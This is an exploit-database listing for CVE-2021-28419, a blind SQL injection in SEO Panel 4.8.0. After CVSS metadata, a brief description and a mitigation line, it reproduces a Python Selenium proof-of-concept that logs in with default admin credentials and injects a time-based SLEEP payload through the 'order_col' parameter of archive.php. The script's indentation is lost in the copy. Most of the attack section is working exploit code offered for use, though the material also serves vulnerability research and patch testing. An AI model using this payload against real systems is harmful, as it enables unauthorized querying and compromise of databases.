header-logo
Suggest Exploit
vendor:
SEO Panel
by:
nu11secur1ty
7.2
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: SEO Panel
Affected Version From: 4.8.2000
Affected Version To: 4.8.2000
Patch Exists: NO
Related CWE: CVE-2021-28419
CPE: a:seopanel:seopanel:4.8.0
Metasploit:
Other Scripts:
Tags: cve,cve2021,sqli,seopanel,auth,packetstorm
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 3, 'verified': True, 'vendor': 'seopanel', 'product': 'seo_panel'}
Platforms Tested:
2021

SEO Panel 4.8.0 – ‘order_col’ Blind SQL Injection (2)

This exploit allows an attacker to perform a blind SQL injection attack in SEO Panel version 4.8.0. By manipulating the 'order_col' parameter in the archive.php page, an attacker can execute arbitrary SQL queries.

Mitigation:

Update to a patched version of SEO Panel or apply the vendor's recommended fixes.
Source

Exploit-DB raw data:

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04/25/2021
# Vendor: https://www.seopanel.org/
# Link: https://www.seopanel.org/spdownload/4.8.0
# CVE: CVE-2021-28419

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28419

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/seopanel/login.php"

#enter your login username
username="spadmin"

#enter your login password
password="spadmin"

#enter the element for username input field
element_for_username="userName"

#enter the element for password input field
element_for_password="password"

#enter the element for submit button
element_for_submit="login"


browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit
browser.get(("
http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT
7397 FROM
(SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1"))

print("payload is deployed MySQL is not responding correctly...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")